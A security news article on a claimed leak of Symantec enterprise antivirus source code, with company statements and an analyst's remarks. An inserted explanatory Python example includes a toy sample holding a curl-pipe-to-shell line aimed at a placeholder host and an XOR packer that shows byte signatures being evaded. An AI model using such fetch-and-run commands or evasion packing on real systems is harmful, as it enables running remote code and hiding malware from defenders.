
Symantec Confirms Hackers Accessed Source Code of Two Enterprise Security Products

On Thursday evening, SecurityWeek and other news outlets reported that hackers claimed to have accessed the source code of an unspecified version of Symantec’s Norton Antivirus product. It turns out that the hackers did get their hands on some code, but their claims are off a bit. Norton is a consumer-focused product, and Symantec has confirmed that, from what it has seen thus far, the code accessed by the attackers was from its enterprise product line.

In this case, Symantec confirmed with SecurityWeek early Friday morning that the products in question are Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2, so this incident did NOT involve its consumer products, which are “Norton” branded.

While many would expect the “FUD” factor to kick in, it’s important to realize a few facts. Symantec updates its products on a “.1 basis”, and its Endpoint Protection product is now at versions 12.0 and 12.1. According to a Symantec spokesperson, “SEP 11 was four years ago to be exact.”

In addition, Symantec Antivirus 10.2 has been discontinued, though the company continues to service it.

“We’re taking this extremely seriously and are erring on the side of caution to develop a long-range plan to take care of customers still using those products,” Cris Paden, Senior Manager of Corporate Communications at Symantec, told SecurityWeek.

“It’s also important to bear in mind that this is not a virus or false positive. The products are not broken. They perform just fine and work just fine.”

Unlike the RSA breach, in which hackers penetrated the company’s networks to steal confidential data and intellectual property, Symantec confirmed that its own systems had not been breached. “Symantec’s own network was not breached, but rather that of a third party entity,” the company said in a statement.

The hacker group believed to be responsible operates under the name Dharmaraja and claims it found the data after compromising Indian military intelligence servers.


“We are still gathering information on the details and are not in a position to provide specifics on the third party involved,” the company said. “Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions. Furthermore, there are no indications that customer information has been impacted or exposed at this time. Symantec is working to develop a remediation process to ensure long-term protection for our customers’ information,” the company said in a statement. “We will communicate that process once the steps have been finalized. Given the early stages of the investigation, we have no further details to disclose at this time but will provide updates as we confirm additional facts.”

Rob Rachwald, Director of Security Strategy at Imperva, shared some comforting advice when news of the possible source code exposure was announced. "If the rumors turn out to be true, the implications of the anti-virus code leakage will not keep the Symantec folks awake too late at night, and certainly not their customers," he said. "After all, there isn’t much hackers can learn from the code which they hadn’t known before." Why? "Most of the anti-virus product is based on attack signatures," he said. "By basing defenses on signatures, malware authors continuously write malware to evade signature detection."

"The workings of most of the anti-virus’ algorithms have also been studied already by hackers in order to write the malware that defeats them," Rachwald added.
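The point Rachwald makes above, that signature-based detection is defeated by rewriting the malware's bytes rather than by studying the scanner's source, can be shown with a toy scanner. The following is an added example written for this article; it is not Symantec's engine, not an Imperva tool, and uses no real signature. The sample payload, the signature names and the XOR "packer" are all constructed for illustration.

```python
"""Toy byte-signature scanner and a trivial packer that evades it.

Everything here is constructed for illustration: the "malicious" sample,
the signature database and the packer are made up and match nothing real.
"""
import hashlib
from typing import Dict, List

# Constructed sample: a fake shell dropper with a recognisable marker string.
ORIGINAL_SAMPLE = b"#!/bin/sh\necho EVIL_MARKER_7f3a\ncurl http://example.invalid/x | sh\n"

# Signature database of the kind the quoted remark describes: fixed byte patterns
# and one whole-file hash. Names ending in ".hash" are compared against SHA-256.
SIGNATURES: Dict[str, bytes] = {
    "Toy.Downloader.A": b"EVIL_MARKER_7f3a",                       # substring signature
    "Toy.Downloader.A.hash": hashlib.sha256(ORIGINAL_SAMPLE).digest(),  # exact-file signature
}


def scan(sample: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Return the names of every signature that matches `sample`, in database order."""
    hits: List[str] = []
    digest = hashlib.sha256(sample).digest()
    for name, pattern in signatures.items():
        if name.endswith(".hash"):
            if pattern == digest:
                hits.append(name)
        elif pattern in sample:
            hits.append(name)
    return hits


def xor_pack(payload: bytes, key: int) -> bytes:
    """Trivial packer: XOR every byte with `key` and prepend the key.

    The stored bytes differ from the original, so a signature written against
    the original no longer matches, although the unpacked behaviour is identical.
    A key of 0 would leave the bytes unchanged and the signature would still hit.
    """
    if not 1 <= key <= 0xFF:
        raise ValueError("key must be a non-zero single byte")
    return bytes([key]) + bytes(b ^ key for b in payload)


def xor_unpack(packed: bytes) -> bytes:
    """Reverse xor_pack: read the key byte, then XOR the rest back."""
    key = packed[0]
    return bytes(b ^ key for b in packed[1:])


if __name__ == "__main__":
    print("original   :", scan(ORIGINAL_SAMPLE))
    # One appended byte defeats the whole-file hash but not the substring rule.
    print("one-byte mod:", scan(ORIGINAL_SAMPLE + b"\n"))
    packed = xor_pack(ORIGINAL_SAMPLE, 0x5A)
    print("xor-packed  :", scan(packed))
    print("unpacks OK  :", xor_unpack(packed) == ORIGINAL_SAMPLE)
```

Running it shows both signatures firing on the original, only the substring rule surviving a one-byte change, and neither rule matching the XOR-packed copy even though it unpacks to the identical payload. This is the asymmetry in the quote: the attacker only needs to change the bytes the signature looks for, and learns nothing from the scanner's source that black-box testing against the product would not already reveal.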

Symantec also highlighted that it distributed 10 million new signatures to respond to new threats in 2010 alone. The code in question is four and five years old and has evolved and changed significantly over the years.

More information from Symantec is expected Friday afternoon.